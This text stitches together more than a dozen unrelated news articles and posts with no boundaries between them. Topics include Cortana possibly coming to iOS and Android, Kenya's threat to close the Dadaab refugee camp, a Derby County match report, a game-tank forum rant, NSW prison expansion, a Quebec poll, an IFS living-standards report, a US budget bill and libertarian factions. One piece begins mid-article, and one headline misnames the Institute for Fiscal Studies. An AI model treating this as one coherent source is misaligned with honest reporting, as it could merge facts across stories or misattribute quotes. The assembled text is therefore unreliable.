Microsoft management is considering the wisdom and feasibility of making the company's Cortana personal digital-assistant technology available on Apple's iOS and Google's Android mobile operating systems.
During a keynote at the SMX Advanced search-marketing conference in Seattle this week, officials acknowledged that the company is weighing the potential trade-offs between pervasiveness and prioritizing. Both GeekWire and Search Engine Land reported on the Microsoft keynote where officials discussed Cortana's possible future.
GeekWire quoted Marcus Ash, a Windows Phone group program manager, as saying "it's a bit of a head scratcher for us right now" as to whether Cortana has a future on iOS and Android.
Ash and Rob Chambers, a group program manager in Microsoft's Applications and Services division, also noted during the June 12 keynote appearance that Microsoft wouldn't be able to integrate Cortana as seamlessly into non-Windows-based devices as it can with Windows Phone. That said, Microsoft's cross-platform push has been increasing as of late, Chambers said.
Neither executive offered any timeline as to when Microsoft might be interested in getting Cortana on iOS or Android. But they did admit there's also the hurdle as to whether and when iOS users would be willing to use Cortana rather than Siri or Google Now, the digital assistants baked into the iOS and Android platforms, respectively.
Microsoft does currently offer Bing apps for iOS and Android, and Apple is increasingly open to using Bing to serve up search results. Recent Microsoft moves, such as making a touch-optimized version of Office available for the iPad -- and most likely, on Android -- ahead of the touch-first Office suite for Windows 8 show that the new Microsoft is willing to put its software and services where users are.
But where does management draw the line? Is Cortana, which is currently still in preview for Windows Phone 8.1 only, a crown jewel that Microsoft should guard as a Microsoft-platform differentiator? (Microsoft is rumored to be planning to make Cortana available on a future version of Windows, possibly next year's Threshold release, as well as on Xbox at some point.) Or would Cortana have more value, as well as more user-input fodder, if it's not just a Windows-only thing?
Until the past year or so, I'd have bet Microsoft management wouldn't even remotely consider bringing Cortana to non-Windows platforms. These days, all bets are off. I wouldn't be surprised to see Cortana show up as an option for iOS and Android platforms, maybe starting with Microsoft's Android-based Nokia X phones.
This story originally appeared as "Could and should Microsoft bring Cortana to iOS, Android?" on ZDNet.
Now playing: Watch this: Cortana takes on Google Now, Siri
Dadaab refugee camp in northeast Kenya. The Kenyan government says the camp has been infiltrated by terrorists and must be shut down.
April 20, 2015 Dadaab refugee camp in northeast Kenya. The Kenyan government says the camp has been infiltrated by terrorists and must be shut down. Kevin Sieff/The Washington Post
The Kenyan government is threatening to close the Dadaab camp, forcing more than 300,000 people to return to Somalia.
The Kenyan government is threatening to close the Dadaab refu­gee camp, forcing more than 300,000 people to return to Somalia.
The Kenyan government is threatening to close the Dadaab refu­gee camp, forcing more than 300,000 people to return to Somalia.
The Kenyan government is threatening to dismantle the world's largest refugee camp, setting off a panic among the nearly 350,000 people who live here and the international aid organizations that care for them.
Kenyan officials say the camp is a national security threat, a constellation of tents and huts used by the Somali extremist group al-Shabab to plan attacks, like the one on Garissa University College that killed 148 people last month.
Nearly 25 years after it was constructed as a temporary solution for families fleeing Somalia's civil war, the Dadaab refugee complex (actually made up of multiple camps) is now a sprawling city. Dispelling its occupants would not only be a logistical nightmare, aid officials say, but also a humanitarian disaster.
Some experts doubt Kenya will go ahead with the drastic step. But the announcement this month has created new concerns at a moment when the global number of refugees and displaced people has surged to its highest level since World War II, leaving aid organizations severely strained. More than 700 migrants died this month when an overcrowded boat capsized in the Mediterranean Sea, a vivid sign of the growing number of African and Middle Eastern residents fleeing oppression, war and poverty.
Sulekho Dahir, 20, heard the news of Kenya's order on the radio while in her house made of sticks and a plastic tarp, similar to thousands of others on this flat expanse of scrubland near the Kenya-Somalia border. The announcer read a statement from Kenya's vice president, William Ruto: “The way America changed after 9/11 is the way Kenya will change after Garissa.”
Dahir was born here. She was married here. A few years ago, she gave birth to her daughter here. Her “alien identification card” lists her nationality as Somali, but she has never been to Somalia. The voice on the radio said she would have to leave in three months.
When the camp was built in 1991, it was just an agglomeration of white tents. There's now a sense of permanence in its 52 schools and 11 police stations, the thousands of cinder-block huts with tin roofs and establishments such as the Yasir Driving School, the Amazing Grace Hotel and the Best Friends Electronics store. But mostly the permanence takes the form of people such as Dahir, who watch from afar as Somalia is buffeted by one crisis after the next.
Sending them back to Somalia when al-Shabab still controls vast swaths of the country “would be a disaster, a human tragedy and a humanitarian catastrophe,” said Leonard Zulu, the acting director for the United Nations High Commissioner for Refugees (UNHCR) in Dadaab.
A symbol
In North Africa, thousands of African migrants and asylum-seekers board shoddy boats to flee to Europe, many of them dying en route. But Dadaab appears to be a symbol of a different kind of refugee crisis — an aging support system for those fleeing conflict and famine, in which resources are stretched thin even as tension with host countries mounts.
UNHCR's funding needs have grown by 130 percent since 2009, but its budget has increased by only 70 percent, according to a forthcoming report from the Washington-based Migration Policy Institute. Signs of the shortfall in aid are evident in Dadaab, where childhood malnutrition hovers at around 10 percent.
Although the camp was constructed as a temporary facility for people fleeing Somalia's civil war, that conflict never ended. Instead, it evolved with the emergence of Islamist groups and eventually al-Shabab, which is linked to al-Qaeda. More refugees poured into Dadaab when Somalia faced a famine in 2011.
The number of resettlement slots for refugees in Europe and the United States is tiny compared with the demand; only a small fraction of Dadaab's residents have been able to make that move.
The Somalia crisis has gone on for so long that many refugees don't have roots in any country. Somalia is a place that Dahir hears about on the radio and television: “Bombs going off, people getting murdered, no schools or hospitals,” she said. In the past month, al-Shabab militants have attacked a U.N. convoy, the Ministry of Higher Education, a popular restaurant and hotel and other targets.
Even Kenya — or the Kenya outside of the camp — is a distant land to Dahir, inaccessible with her alien identification card. So the idea that she would go somewhere else, in either direction from Dadaab, made little sense to her.
“There's nowhere else,” she said.
As Dadaab has grown, so have the security problems it poses. Al-Shabab militants have been able to slip into the camp, according to Kenyan officials, hiding weapons and recruiting young fighters. After Kenya sent troops into Somalia in 2011 to fight the extremists, a string of retaliatory bomb attacks targeted police trucks in the camp and six foreign aid workers were kidnapped.
Kenyan officials offer a range of reasons why some of Dadaab's refugees support al-Shabab — clan ties, pressure from militants, financial compensation. But evidence supporting those claims has never been made public.
After the 2013 attack on a Nairobi mall left 67 dead, Kenyan officials reiterated their belief that Dadaab was a safe haven for terrorists. Parliamentarians and cabinet members, including the interior minister, asked for Dadaab to be closed. That didn't happen, and many believe the current plan will similarly fade away.
“It's a threat the government made to show they're doing something to combat the terrorism problem, but to carry out a shutdown would be quite difficult,” said Mark Yarnell, a senior advocate for Refugees International, a Washington-based research organization.
Kenya is a signatory to the 1951 U.N. Refugee Convention, which forbids the involuntary return of refugees to a country where they face persecution. In 2006, Kenya passed its own law enshrining the rights of refugees, though critics say it has been poorly implemented.
Already, the Kenyan government appears to have backed away from the initial three-month timeline to close Dadaab. The foreign minister, Amina Mohamed, said last week that the pace of repatriation “will depend on available resources.”
‘They will kill me'
Still, the United Nations and other aid organizations appear to be taking seriously the government's pledge to close Dadaab. The head of UNHCR, António Guterres, is scheduled to visit the camp early next month. U.N. officials have been discussing the issue with the Kenyan government.
One potential problem is that dispersing the refugees, nearly half of whom are younger than 18, would create a massive pool of young men susceptible to al­Shabab recruitment or abduction.
“What will happen to all the youths not occupied in school and vocational activities?” asked Zulu, the UNHCR official.
Still, U.N. officials acknowledge the security concerns in Dadaab. The situation is so unpredictable that even Kenyan employees working for the United Nations are only allowed to travel in the camp with armed escorts during a small window each day.
“It's as if we've lost this part of the country,” said Albert Kimathi, the deputy county commissioner in Dadaab. “For al-Shabab, this is a haven.”
Last week, the Kenyan police arrested about 30 people in the camp, Kimathi said, many of them suspected of abetting terrorists.
Many of the refugees in Dadaab say it's unfair to depict it as a sanctuary for terrorists. The people who live here are victims of al-Shabab, they say, not sympathizers.
Ahmed Mohammed Salem, who said he was accused of theft by al-Shabab, rolled up his jacket sleeve to reveal the stump of his right arm, which he said was cut off in 2012 in Mogadishu, the Somali capital.
“If I go back they will kill me,” he said. “This place is hard, but the situation is much worse over there.”
Last year, UNHCR began a program that offered support to refugees who volunteered to return to Somalia, an initiative conceived in part as a way of reducing the size of the camp. Only Somalis from relatively peaceful parts of the country are eligible for the assistance, and a mere 2,000 people have volunteered to go back.
But many of the people visiting UNHCR offices in Dadaab are no longer inquiring about the voluntary return program. They're asking about the Kenyan government's eviction plan.
“Is it true that we will all have to go home?” asked Abdul Qadir Munin, a refugee from Mogadishu, during his visit to the repatriation office last week.
“We are still in discussions,” replied Maawiye Yusuf Issa, who works for UNHCR. “We will let you know when we have an answer.”
But Issa knew how difficult a return to Mogadishu would be. When Munin turned to leave, Issa said in English, a language the refugee couldn't understand: “It's chaos there.”
Read more
Al-Shabab attacks Kenyan university, killing at least 147
Al-Shabab threatens more attacks after college massacre
White House defends Somalia strategy as counterterrorism model
Derby County set a club record for home consecutive clean sheets as Darren Bent's second half penalty proved to be enough in a tense 1-0 win over Birmingham City.
The 32-year-old tucked away his spot kick, sending Tomasz Kuszczak the wrong way, after Richard Keogh had been hauled down in the penalty area by opposing captain Michael Morrison.
Nail biting from start to the end, Steve McClaren's side had to work hard to keep Gianfranco Zola's side at bay as the Rams claimed a seventh successive shut out on home soil to lift themselves to within a point of the coveted Sky Bet Championship top six.
Chances were at a premium throughout this game and that was the case in the opening stages as the visitors started strongly at Pride Park Stadium.
Seeing plenty of the ball, they still very rarely threatened to breach Scott Carson's goal and after 15 minutes, McClaren's men began to work their way back on top of the contest and saw more of the possession as a result.
Bent's glancing header was the only real notable opportunity during this period, but on 28 minutes, Lukas Jutkiewicz should have done better in a clear shooting opportunity, just left of centre, but he screwed his effort wide.
With the first-half entering is dying stages, the action began to open up at both ends of the pitch and just after the half-an-hour mark it was Derby who very nearly made the most of it.
After regaining possession towards the left side of the pitch, Johnny Russell was able to get on the end of an impressive through ball and he immediately delivered it into the box where Bent was lurking eagerly, but Kuszczak raced off his line to get the ball out of danger.
Goalless at the interval, Derby were a far more imposing outfit in the second 45 minutes and began the second half strongly.
As play resumed, the hosts showed their intent to take the lead almost immediately and a succession of chances with Will Hughes, Russell and Bent at the forefront it was only the final ball which prevented McClaren's side from gaining any reward.
On 55 minutes, Bent was presented with a golden opportunity to take the lead after Shotton's backwards header was seized upon. Unfortunately for the Derby forward, Kuszczak was quick off his line once again and this allowed him to push the ball out the way of any immediate danger.
Keen to continue the attack, Tom Ince was quickest to the loose ball and after weaving his way into the box, he launched a powerful, low driven shot in the stomach of the grateful Birmingham City ‘keeper, who had retreated back to his goalline.
With tensions rising and the nerves of both sides beginning to show, a foul committed on Keogh in the Birmingham City box by Morrison, the visitors' captain, saw the Rams awarded a penalty in the 63rd minute.
Confidently, Bent, a former Aston Villa forward, stepped up to the spot and converted by sending Kuszczak the wrong way in a calm and collected manor to give his side the advantage in what was a closely contested encounter.
With momentum behind them, Derby continued in the same vein – playing with freedom in the hope to extend their lead and in the 71st minute they very nearly did after audacious play between Hughes and Russell saw their attacking phase concluded by the latter player's shot over the crossbar.
The 79th minute was marked with another attacking opportunity and once again it was Hughes who lead the proceedings. After pressing forward with the ball, he laid it off to Ince on his right and his deflected shot fell to Russell who was at close range.
As the game approached its finale, Birmingham made the Rams fight for their victory and piled late pressure on the Derby goal in a desperate attempt to find a late equaliser, but excellent game management saw the Rams keep intact both their lead and clean sheet as the referee called time on what marked as a vital three points and a club record of seven clean sheets in front of a sell-out home crowd.
Derby County: Carson, Baird, Keogh (C), Pearce, Olsson (Anya, 9), Johnson, Butterfield, Hughes, Ince, Bent (Vydra, 76), Russell (Camara, 81)
Substitutes not used: Mitchell, Bryson, Shackell, Weimann
Birmingham City: Kuszczak, Grounds, Shotton, Kieftenbeld (Fabbrini,68), Gleeson, Jutkiewicz, Maghoma (Adams, 62), Stewart, Spector, Davis, Morrison (C)
Substitutes not used: Legzdins, Robinson, Tesche, Brown, Dacres-Cogley
Attendance: 32,616 (3,119 away supporters)
From what I can tell, the issues with the turret come from three separate things.
Firstly, the area I have marked red seems to be absent on the IRL tank. There doesn't seem to be any sort of raised thingy around the bottom of the turret.
Secondly, WG made the blue part just look fat. On the IRL 4202, the gun barrel gets noticeably thicker closer to the turret. In game, it's hard to tell if that's either not even modeled or if it's just modeled so poorly I can't tell. The area around the gun mount looks like it should be more "streamlined" too. The game model has clearly defined edges and looks a bit fat, but IRL it's a lot more smoothed and just overall is nicer to look at.
Lastly, the raised area behind the MG is way too long in game too, which leads me to believe the upper slope is wrong as well. This is backed up by the fact that the turret sides on the game model have basically zero slope to them, when it should be closer to something like 40° roughly. Funnily enough, the turret sides looked just fine on the old model (which was also a gigantic [edited]mess). It's hard to compare actual proportions without being able to have some blueprints or something to compare the game model too.
Spoiler Disclaimer on this second picture: These values are wrong, but the lines are what I'm trying to show off.
The harsh edges on the game model aren't an issue with bad lighting. I compared it to garage screencaps and it's not much better.
TL; DR
WG is still crapat modeling and is making sexy tanks look ugly by stretching them all out and making them look like potatoes.
The new 6,000-square-foot store offers a unique shopping experience unlike any other ABC Store in the Richmond area.
On a quest to upgrade the shopping experience, the Virginia ABC has opened its most upscale location in the Richmond area to date. The new 6,000-square-foot store, located next to Martin's in the Short Pump Crossing shopping center, is unlike any other in the metro region.
Upon entering, the ABC Store looks more like a boutique wine or beer shop than a state-run operation. Dramatic white, Ionic columns evocative of the Virginia State Capitol, exposed brick, a vintage sepia mural of Richmond's skyline from the 1930s, and photographs depicting the Commonwealth's alcohol-centric history give a nod to the past, while offering a modern, spacious interior and expanded selection of products. A chandelier made from liquor bottles hangs from the ceiling near the entrance, illuminating a custom-built tasting bar used by vendors for in-store sampling.
The store's varying wood-grained inlay flooring patterns create a winding center aisle and encourage customers to discover products they might not have known about, without forsaking the ease of identifying favorite brands shoppers have come to expect in a Virginia ABC store.
Virginia Secretary of Public Safety and Homeland Security Brian Moran, Virginia ABC Chairman Jeffrey Painter, and Commissioners Judy Napier and Henry Marsh were in attendance Wednesday afternoon for a grand opening and ribbon-cutting ceremony for the new location.
“We are proud to honor our capital city's rich history in our newest premier store,” Painter said. “Virginia ABC is also proud of its commitment to providing excellent customer service with the addition of this uniquely designed store to the Central Virginia market.”
Painter went on to explain that the ABC's other upgraded stores, known as “premier” locations, have enjoyed significant profit increases, “furthering our efforts to build revenue for the Commonwealth.” Since March 2014, Virginia ABC has opened premier stores in Williamsburg, Leesburg and Virginia Beach.
The Short Pump store, now located at 3450 Pump Road, moved down one building from its former location in the same shopping center. It is one of the largest stores in the state.
Photos: Trevor Dickerson/RVANews
Recommend this
on Facebook
Report an error
Subscribe to our
Weekly Digest
· in West End
NSW prisons to see 1,400 extra beds, old jails re-opened under Government plan
Posted
An extra 1,400 beds for the state's jails have been announced by the New South Wales Government under a plan that includes reopening old jails and commissioning what it calls "rapid-build" projects.
In the July budget for 2016-2017, the Government announced 2,800 extra beds over the next three years as part of a goal to increase capacity by 7,000.
On Friday, Corrections Minister David Elliott visited Wellington jail in the state's central west to announce the construction of a new, separate high-security facility there.
It will have 400 beds and will be constructed under a rapid-build model that will see it completed within 12 months.
Today the minister added to that announcement, releasing details for new beds at six jails, among other developments across the state.
360 extra beds for Nowra Jail on the south coast
240 extra beds at Emu Plains jail in Sydney's west
250 new beds at Bathurst in the state's central west
400 new beds at Kempsey on the mid north coast
480 extra beds at Junee in the Riverina
Berrima jail in the Southern Highlands will reopen next month, with 75 minimum security prisoners.
Another prison being reopened is Unanderra at Wollongong which will have 60 inmates.
"We can't sugar-coat the fact that NSW prisons have been under stress, so this investment will see us address this capacity issue," Mr Elliott said.
Adult prison population increased 12 per cent since last year
As of January this year, the adult prison population was more than 12,000 — a record high and a 12 per cent increase on the year before.
"This is not money that any politician wants to spend," the minister said.
"If I had my way this money would be spent on schools, hospitals, roads and on making NSW much more attractive to foreign investment."
The Government will also expand Cessnock jail by 1,000 beds under a rapid-build model, a move that has been slammed by some members of the community.
Earlier this week, hundreds of Cessnock residents turned out to a meeting to oppose the decision.
A juvenile detention centre at Lidcombe will be "hardened" into an adult jail for 90 women, the Government said.
"On a proportional basis, female incarceration has increased faster than male incarceration," Corrective Services commissioner Peter Severin said.
The minister emphasised his commitment to the rehabilitation of offenders, despite a decision earlier this year to cut the number of teachers in jails from 152 full-time positions to 20.
The Government is creating 60 new roles, but is not clear whether they will require teaching degrees.
"We have to double the number of people doing literacy and numeracy skills in prisons — at the moment we have prisoners doing music appreciation," Mr Elliott said.
"Hopefully some of the people who are doing the jobs now will reapply for the new positions."
Topics: prisons-and-punishment, law-crime-and-justice, urban-development-and-planning, community-and-society, nsw
* Separatists would win majority if Quebec vote held now
* Governing Liberals caught up in scandal allegations
OTTAWA, May 10 (Reuters) - Separatists in the Canadian province of Quebec are well ahead of the governing Liberals and would most likely win a majority in the provincial assembly if an election were held now, a poll released on Monday shows.
A Leger poll for Le Devoir and the Montreal Gazette put the Liberals at 31 percent public support compared with 40 percent for the Parti Quebecois, which wants independence for the predominantly French-speaking province of 7.5 million people.
The Liberals have been hammered by allegations of scandal and corruption.
Although the Liberals won a majority in a December 2008 election and are not in immediate danger, the survey will only increase the pressure on Premier Jean Charest.
Last week Charest fired Family Minister Tony Tomassi and called in the police over his use of a credit card belonging to a security firm. In mid-April, Charest ordered a public inquiry into allegations that some major Liberal donors had influenced the naming of judges.
Charest, who has been Quebec premier for seven years, has so far rebuffed calls for a probe into allegations of corruption in the powerful construction industry.
While in government in 1980 and 1995, the Parti Quebecois held referendums on whether Quebec should be independent. Both failed.
Party leader Pauline Marois has been vague about the timing of another referendum if her party were to regain power.
The Leger survey of 1,001 adults was conducted between May 3 and 6 and is considered accurate to within 3.1 percentage points, 19 times out of 20. (Reporting by David Ljunggren; editing by Peter Galloway)
The Institute for Financial Studies is predicting that households will be almost 20% worse off by 2021
Britain is in the midst of the weakest growth in living standards in at least 60 years, with low income families faring the worst, a leading thinktank has warned.
Weak earnings growth, together with changes to taxes and benefits, will lead to a rise in inequality by 2021-22, according to the Institute for Fiscal Studies (IFS). In a new report on living standards, poverty and inequality, the IFS says incomes for the average family will not grow at all over the next two years.
The IFS calculated that average household incomes will be 18% lower in 2021-22 than could have been reasonably expected in 2007-08, before the global financial crisis took hold of the economy. It means a childless couple would be about £5,900 a year worse off than they might otherwise have been, rising to £8,300 for a couple with two young children.
The IFS said it amounted to the most sustained slowdown in income growth since comparable records began in 1961. Campbell Robb, chief executive of the Joseph Rowntree Foundation, which funded the report, urged the chancellor Philip Hammond to announce measures to support struggling families in next week's budget.
IFS warns of the biggest squeeze on pay for 70 years over Brexit Read more
“These troubling forecasts show millions of families across the country are teetering on a precipice, with 400,000 pensioners and over one million more children likely to fall into poverty and suffer the very real and awful consequences that brings if things do not change.
“One of the biggest drivers of the rise in child poverty is policy choices, which is why it is essential that the prime minister and chancellor use the upcoming budget to put in place measures to stop this happening. An excellent start would be to ensure families can keep more of their earnings under the universal credit.”
If benefit cuts are implemented as planned, the poorest 15% of the population are likely to have lower incomes in five years' time as a freeze in benefits and universal credit – which on average will be less than the benefits it replaces – take their toll.
“Looking forward, we expect the fall in inequality since the recession to be reversed,” the IFS said. The thinktank pointed to lower working-age benefits, which mainly affect less well-off families, as one of the key reasons why the gap between the rich and poor is expected to rise.
Economists have warned that household finances will come under increasing pressure this year as inflation rises but wage growth remains weak. The sharp fall in the value of the pound since the Brexit vote is starting to feed through to the headline rate of inflation, which rose to 1.8% in January, the highest level in more than two years. It is expected to rise further in the coming months, hitting about 3% in early 2018.
Meanwhile the latest official figures on wages showed pay growth slowed unexpectedly to 2.6% in the final quarter of 2016, despite record rates of employment.
Responding to the IFS report, a spokesperson for the Treasury said: “We are taking action to support families with the costs of living by cutting taxes for millions of working people, doubling free childcare for nearly 400,000 working parents and introducing the “national living wage” – a significant pay rise for the lowest earners. More people are now in work than ever before with living standards also forecast to rise over this parliament.”
Separate figures from the Office for National Statistics showed that the number of children living in UK households where no adult is working has fallen to its lowest level since recent records began two decades ago, at 10.7%.
Facebook Twitter Pinterest Damian Green said Conservative policies had given more parents the opportunity to find work. Photograph: Dinendra Haria/Rex/Shutterstock
Damian Green, the work and pensions secretary, said: “More parents now have the opportunity to find work and enjoy the dignity and security of having a regular wage.
“We will continue to build on this success as we roll out universal credit to all parts of the country – ensuring that it always pays to be in work.”
The IFS said average pensioner incomes are likely to rise twice as quickly as those for the rest of the population, if earnings growth projections from the Office for Budget Responsibility (OBR) – the Treasury's independent forecaster – prove correct. By 2021-22, average pensioner income is likely to be 24% higher than it was in 2007-08, the thinktank said.
Pensioner incomes have benefited from real growth in the level of the state pension, people staying on in employment at older ages, and a change in the composition of pensioners, with the newly retiring tending to have larger private pension entitlements than previous cohorts of pensioners.
Child poverty is projected to rise from 27.5% in 2014-15 to about 30% in 2021-22, returning to its pre-recession level. The IFS said the rise was explained by tax and benefit reforms planned for this parliament, particularly the cuts to working-age benefits,.
Andrew Hood, an author of the report and a senior research economist at the IFS, said: “Weak earnings growth combined with planned benefit cuts mean that the absolute poverty rate among children is projected to be roughly the same in 2021-22 as it was in 2007-08. In the decade before that, it fell by a third. Tax and benefit changes planned for this parliament explain all of the projected increase in absolute child poverty between 2014-15 and 2021-22.”
Pensioner poverty, however, is projected to fall from 13% in 2014-15 to 11% in 2021-22.
Tom Waters, a research economist at the IFS, said the impact of the financial crisis would still be felt in the years ahead: “Even if earnings do much better than expected over the next few years, the long shadow cast by the financial crisis will not have receded.”
The OBR will produce an updated set of forecasts for the economy and public finances to coincide with the budget on 8 March.
Though the findings do not represent the formal views of the United Nations, the network is closely tied to the Sustainable Development Goals, which the organization adopted in September, aiming, among other things, to end poverty and hunger by 2030, while saving the planet from the most destructive effects of climate change.
The field of happiness research has grown in recent years, but there is significant disagreement about how to measure happiness. Some scholars find people's subjective assessments of their well-being to be unreliable, and they prefer objective indicators like economic and health data. The scholars behind the World Happiness Report said they tried to take both types of data into account.
In a chapter of the report on the distribution of happiness around the world, three economists — John F. Helliwell, of the University of British Columbia; Haifang Huang of the University of Alberta; and Shun Wang of the Korea Development Institute — argued against a widely held view that changes in people's assessments of their lives are largely transitory. Under this view, people have a baseline level of contentment and rapidly adapt to changing circumstances.
The three economists noted research showing that people's evaluations of their lives “differ significantly and systematically among countries”; that within countries, subgroups differ widely in their levels of happiness; that unemployment and major disabilities have lasting influences on well-being; and that the happiness of migrants approximates that of their new country, instead of their country of origin.
The three economists noted that crises can prompt vastly different responses based on the underlying social fabric. In Greece, where the economy began to plummet in 2007, setting off a crisis in the eurozone that has resulted in three financial bailouts, widespread corruption and mistrust were associated with the diminishing sense of happiness over the past decade.
In contrast, trust and “social capital” are so high in Japan that scholars found, to their surprise, that happiness actually increased in Fukushima, which was devastated by an earthquake and tsunami in 2011, because an outpouring of generosity and cooperation contributed to the community's resilience and rebuilding.
“A crisis imposed on a weak institutional structure can actually further damage the quality of the supporting social fabric if the crisis triggers blame and strife rather than cooperation and repair,” the economists wrote. “On the other hand, economic crises and natural disasters can, if the underlying institutions are of sufficient quality, lead to improvements rather than damage to the social fabric.”
The Senate on Wednesday voted to send President Obama a temporary budget bill that cuts $4 billion from US spending but keeps the government running, for now.
Whew! That was a close one. This means there won't be a federal government shutdown, right? Mischief managed. Let's move to the next issue.
Hold on there, buckaroo. The vote does not solve the underlying differences between Republicans and Democrats over 2011 spending cuts. All it does is kick the day of reckoning down the road. Specifically, to March 18, which is the date when the two-week budget legislation turns back into a pumpkin by expiring.
What happens now is that Washington faces a tight 14-day period into which lawmakers will try to compress an entire year's worth of budget debate. Will Republicans be able to cut the budget to their satisfaction? Will Democrats be able to protect the programs they feel are necessary to economic recovery and national welfare? Will Jack Bauer save America from a conspiracy so deadly it frightens even itself? The clock is ticking.
Seriously, the just-passed spending bill may have at least two important implications:
First, the GOP is making some headway in forcing cuts. Senate Democrats originally had wanted a clean temporary spending bill that kept the government open at current spending levels while negotiations continued. What they ended up accepting was a bill that contained $4 billion in cuts found by getting rid of earmarks (lawmaker pet projects) and by dropping programs that the Obama administration had proposed be ended.
Republicans now will be able to exert pressure on the Senate and the White House to accept the further $61 billion in reductions for fiscal year 2011 contained in a budget bill that the House passed earlier in the month.
“What I'd like to see is us adopt the House position,” said Senate minority leader Mitch McConnell (R) of Kentucky on Tuesday. “There seems to be some reluctance to do that on the part of the administration and Senate Democrats, so we'll keep talking about how to go forward.”
Second, the White House may now be more fully involved in the budget negotiations. Mr. Obama has stayed above the budget-cut fray, for the most part, but Senate Democrats are eager for him to use the bully pulpit of his office to press their position.
Obama is “going to become more engaged, as he's indicated he will, and I know he will,” said Senate majority leader Harry Reid on Tuesday.
In recent days, Obama did call House Speaker John Boehner (R) of Ohio to ask that the temporary spending bill be a month long, instead of two weeks, with correspondingly more reductions. Speaker Boehner rejected that approach, but only on procedural grounds, saying that the proposal came too late in the game.
So the two sides may have some common ground to at least work out a few more weeks of government spending. Perhaps.
But right now, it appears unlikely that two weeks will be enough time to work out a spending plan to ensure that the government stays open through the end of the fiscal year in September. Republican leaders are under intense pressure from freshmen elected with tea party support to press for deep budget reductions. Democrats respond that those reductions will snuff out jobs at a time when the United States badly needs them.
The $61 billion in cuts approved by the House are taken only from discretionary spending, which is a small portion of the overall budget, noted Sen. Richard Durbin (D) of Illinois, the majority whip, on the Senate floor Wednesday.
“The House took 14 percent of the federal budget and makes all of its cuts in it,” said Senator Durbin, adding that the reductions would force the Argonne National Lab in his state to lay off one-third of its scientists and staff.
Despite a push to have birth control co-pays eliminated by classifying hormonal contraceptives as preventative care under health care reform, no dice — at least not yet.
The U.S. Preventive Services Task Force issued its first round of recommendations today, but birth control pills weren't on the list of recommended free care. According to The Wall Street Journal, "The Planned Parenthood Federation of America is pushing for it to be included in a separate set of regulations on women's health expected to come out in the coming months." Fingers crossed.
Earlier this week, The Daily Beast's Dana Goldstein gauged the level of conservative opposition to requiring hormonal birth control to be fully covered under health care reform preventative care services. Access to contraception, Planned Parenthood president Cecile Richards told Goldstein, is a rare middle ground on the reproductive rights front. Even the Conference of Catholic Bishops has been relatively muted on the point.
"I don't want to overstate or understate our level of concern," said McQuade, the Catholic bishops' spokesperson. "We consider [birth control] an elective drug. Married women can practice periodic abstinence. Other women can abstain altogether. Not having sex doesn't make you sick."
Advertisement
Again, the word is "relatively." We'll have the next few months to find out just how high that level of concern is, and whether it will make any difference.
The Religious Right Versus Birth Control [Campus Progress]
The Coming Battle Over The Cost Of Birth Control [Daily Beast]
White House To Unveil List Of Free Preventative Services [WSJ]
Earlier: Wouldn't It Be Nice If Birth Control Pills Were Free?
Image via Wallenrock/Shutterstock
The idea to eliminate stamp duty was the result of best practice, non-partisan recommendations from taxation specialists, primarily the Quinlan review. Read the ACT Taxation Review from May 2012 here
Rates are also increasing because of our compounding capital and maintenance costs of the city's infrastructure, namely roads, sewerage and draining systems, electrical distribution network, telecommunications, waste management, parks and gardens upkeep, etc.
This ever expanding infrastructure liability, spread over a very low density taxation base, i.e. Ratepayers, means that each of us has a bigger and bigger bill as we spread our suburbs further into the surrounding countryside.
Light rail and its associated land use relationship is proven to actively combat the problem of suburban sprawl. Making use of already existing infrastructure and attracting development within the established urban footprint it will increase the taxation base such that Canberra will be more than able to afford future infrastructure capital and maintenance liabilities.
Plus, with the uncoupling of the city's reliance on stamp duty as a source of income, we can also combat suburban sprawl by not being reliant on the sale of land to fund these things.
That light rail is a small component of the ACT Budget
That there is no possible way that rates increases are driven by light rail in the context of all other government spending
For more frequent updates on Capital Metro and light rail related news, please visit our Facebook page
Taxation reform introduced following the 2012 election has seen inefficient taxes removed and stamp duty start to be phased out. Rates and land tax has risen as a result. The reasons for taxation reform are that the ACT requires a reliable revenue stream, and the stamp duty income is heavily dependent upon land sales and real estate booms.These articles explain this quite well:The two graphs below illustrate two things:But aren't our rates skyrocketing? There is no question that peoples rates are increasing. They have not tripled. No ones rates have tripled. Increases have been due to stamp duty reduction and the associated increase in rates, and the increase in your property value since 2012.This graphic from the Riot Act demonstrates this well.
We are looking for a talented programmer proficient and experienced with JavaScript to join our team. We will collaborate on creating new versions of our applications using Ember. Proficient Ember skills are preferred, but expertise in other libraries (Backbone or Angular) is acceptable. The main factors - skilled at JavaScript programming, MVC style programming in JavaScript, and using RESTful APIs. You will also need proficient SCSS & CSS for Front-End design. We will be using a Ruby on Rails back-end for the API, so bonus points if you have Rails experience. We are seeking someone who welcomes collaborating in a team environment, and is also able to feel satisfied when working on a solo project.
We will consider full-time, part-time and contract employees. We're looking for a minimum of 25 hours per week.
We are looking for someone who:
- Has an intimate knowledge of Ember, GIT and JavaScript
- Tampa Bay area preferred, remote is available
- Is a positive & motivated person with good attention to detail
- Uses a pragmatic programmer approach
- Works well solving problems under pressure
- Enjoys a challenge and crafting creative solutions
- Continually keeps abreast of the industry and refreshes skills
- Has experience working with web services and APIs
- Writes good test coverage
We are a family business and we are committed to providing an extended family community and culture.
Looking for news you can trust? Subscribe to our free newsletters.
Congressman Ron Paul's third-place finish in Tuesday's Iowa Republican Caucus was a remarkably strong showing for a candidate who has so little in common with mainstream Republicans. Perhaps the nation's most politically unique congressman, Paul shares policy stances with conservatives, liberals, and libertarians, while differing markedly from all of them.
So where does Paul fit in the Libertarian universe?
Libertarian Theology
Libertarianism might be a simple ideology, an aversion to big government in all its forms, but don't tell that to libertarians: “Like any movement of any size,” says Nick Gillespie, editor of the libertarian magazine Reason, “it is an endless operation of trying to figure out more and more ways in which people who agree on 99.9 percent of everything can really hate each other's guts.”
Anarcho-Capitalists: The most radical of the lot, they want to abolish government entirely (though, unlike regular anarchists, they do support private property rights). “The state acts like a band of thieves and killers,” explains Lew Rockwell, the best-known exponent of this strain. “The private sector doesn't do that.”
Minarchists: Archrivals to the anarcho-capitalists, they support a minimalist version of government: Let the state handle roads, policing, and defense—but nothing more. Many, including Ron Paul, view the Constitution as the ultimate minarchist document.
Cosmopolitan Libertarians: Term used by the minarchist editors of Reason to describe their embrace of world citizenship and deride rivals as hayseeds
Economic Libertarians: Worship free-market absolutists like Milton Friedman
Hippie Libertarians: Worship freedom-loving freaks like Larry Flynt
Religious Libertarians: Worship deities of their choosing, care about politics primarily as it affects religious freedom. In 17th-century England they were Puritan Roundheads. In 21st-century America they're Mormons.
